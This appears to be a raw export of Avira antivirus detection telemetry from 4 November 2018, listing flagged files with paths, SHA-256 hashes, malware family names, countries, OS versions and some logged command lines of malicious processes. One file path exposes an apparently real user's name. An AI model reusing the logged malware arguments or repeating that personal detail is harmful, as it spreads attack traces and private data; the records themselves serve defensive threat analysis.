  Row(detection=Row(filename='avscan-20181104-172906-cad85268', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85adc6b7\\AVSCAN-20181104-172748-C40F4DF5\\AVSCAN-20181104-172906-CAD85268', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:28:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172925-cc81531e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85adc6b7\\AVSCAN-20181104-172748-C40F4DF5\\AVSCAN-20181104-172925-CC81531E', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:28:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1531919\\noceduti.VIR', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T19:57:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1531919\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/mhp \\\\\\/mds \\\\\\/mnt \\\\\\/ext:pilp \\\\\\/inst_loc=360,132,646,504 \\\\\\/RSF=680 \\\\\\/prod:b \\\\\\/aflt=wbf_vjvweqoh9bdfhjlsu9utb1we_18_44_10 \\\\\\/instlref=s5  \\\\\\/noadmin \\\\\\/nochrome \\\\\\/adt=tE1L1R1V2Y1L1Qzu0B0E0ByBtD0Dzz0DtCyDyEtBtCyByD0FtTtE1L1R1V1B1Q2ZzutBtDtCzztCtCtDyEtCyEyDtAyDyByByDtAtTtE1Q1G1Izu2Y1G1J1G1F2W1GtTtE1Q1G1I1M2YzuyD', country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1531919\\noceduti.exe', parentsize=512000, timestamp='2018-11-04T19:57:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151323-c14ea3ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150431-7A3251AF\\AVSCAN-20181104-151323-C14EA3FF', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:13:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151639-db7fe002', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151639-DB7FE002', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:16:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151647-dc8e62cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151647-DC8E62CC', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:16:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3628141\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Roaming\\The SIMS 4\\sims4seasons_0039105070.exe', parentsize=2454672, timestamp='2018-11-04T20:07:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200213-6dd43aad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1d9ed844\\AVSCAN-20181104-200022-6105CB86\\AVSCAN-20181104-200213-6DD43AAD', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:59:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7773631\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/mhp \\\\\\/mds \\\\\\/mnt \\\\\\/ext:pilp \\\\\\/inst_loc=360,132,646,504 \\\\\\/RSF=636 \\\\\\/aflt=wnf_svcpyxoji_18_44_04 \\\\\\/instlref=s5  \\\\\\/noadmin \\\\\\/nochrome \\\\\\/adt=tE1L1R1V2Y1L1Qzuzy0CtAtDyD0B0F0AyC0EtCtAyCtAtCtCtTtE1L1R1V1B1Q2ZzutBtDtCzztCtCtDyEtCyByDzzyEzztCzzzztTtE1Q1G1Izu2Y1G1J1G1F2W1GtTtE1Q1G1I1M2YzuyD', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7773631\\noceduti.exe', parentsize=512000, timestamp='2018-11-04T19:59:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151731-e2554f91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151731-E2554F91', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:17:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6832729\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/mhp \\\\\\/mds \\\\\\/mnt \\\\\\/ext:pilp \\\\\\/inst_loc=360,132,646,504 \\\\\\/RSF=1500 \\\\\\/aflt=wcg_auwei_18_44_09 \\\\\\/instlref=s5  \\\\\\/noadmin \\\\\\/nochrome \\\\\\/adt=tE1L1R1V2Y1L1Qzuzy0C0ByBtD0D0AyCyDzyzz0BtAzz0DtCtTtE1L1R1V1B1Q2ZzutBtDtCzztCtCtDyEtCyDtCtByEzzyBtCyBtTtE1Q1G1Izu2Y1G1J1G1F2W1GtTtE1Q1G1I1M2YzuyD', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6832729\\noceduti.exe', parentsize=512000, timestamp='2018-11-04T20:17:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='2b65b56963bc9381b5531a6ea0ae958c102de9ca90495bbe38c956654f350eb6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:58:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160728-f9f35fff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0a27669a\\AVSCAN-20181104-160537-E9C28039\\AVSCAN-20181104-160728-F9F35FFF', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='2bd310998055ce78ad91a9f366d94b970fd4b4f4c1de14e3bd57a7fc1de1bbc4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qa_auth_server.dll', filepath='\\\\?\\C:\\wamp\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\qa_auth_server.dll', filesize=172000, name='W32/Ramnit.C.#M1.#R1'), hash='2c949caf2891fad29609319a069b003fd7e62c1d558d699d49b863c24cebc03f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:40:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='E:\\SOFT 2014\\Scanner Driver\\Microtek Scanner ScanMaker 610060005900 Driver\\pi_finereader_v4_0\\Setup.exe', filesize=128000, name='W32/Sality.AW.#M1.#R1'), hash='2c969b5edad21926aedf1f2b8b21e7255dda9080bc837ccc29a4c49b942118a9', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-04T03:01:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8577329.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8577329.VIR', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:45:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8577329.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8577329.VIR', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:45:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8577329.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8577329.VIR', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:45:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075113-60fad743', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24dc9eb5\\AVSCAN-20181104-074808-392E2EED\\AVSCAN-20181104-075113-60FAD743', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:51:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075147-686a0bd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24dc9eb5\\AVSCAN-20181104-074808-392E2EED\\AVSCAN-20181104-075147-686A0BD2', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:51:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4720879.vir', filepath='\\\\?\\C:\\Program Files (x86)\\sSuper\\4720879.VIR', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:47:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='birthday.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-55JSJ.tmp\\Birthday.exe', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:00:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='exhibit2.exe', filepath='H:\\IDATA  250G\\SOFT CH\\图像\\声影制作专家3d模板(绝对精彩版)\\3d模板\\exhibit2.exe', filesize=320000, name='TR/Dropper.Gen2.#M300.#R100747'), hash='2d471d4c9e75f5bb3d725f0ce30eedf3823f8ced124f712b673acd5d2e124038', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:05:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='C:\\WINDOWS\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline='-cmode:2D0069006E00740020002D00730069006C0065006E00740020002D006300750072006500690074002D007100720020002D00720070006300700072003A006E00700020002D00720070006300650070003A005C0070006900700065005C0031003000440034004100440036003200410020002D0064006C006C002D0...0065007800650020002D00610072006B0064006C006C002D006E0061006D0065003A005900480032004400560039003400610048004A00620076002E0064006C006C0020002D00610072006B006400610065006D006F006E002D00650070003A005C0070006900700065005C00310030004500380037004600380031003400', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\122CD1B0-6EE3F0E6-5F423020-935C808E\\BvpKjqrM64Zdo.exe', parentsize=2393400, timestamp='2018-11-04T15:22:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:31:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-214231-ea119df5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c3c616b9\\AVSCAN-20181103-213540-C6435A66\\AVSCAN-20181103-214231-EA119DF5', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:42:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:56:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T04:11:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T22:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T22:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:56Z'), dt=datetime.date(2018, 11, 4)),
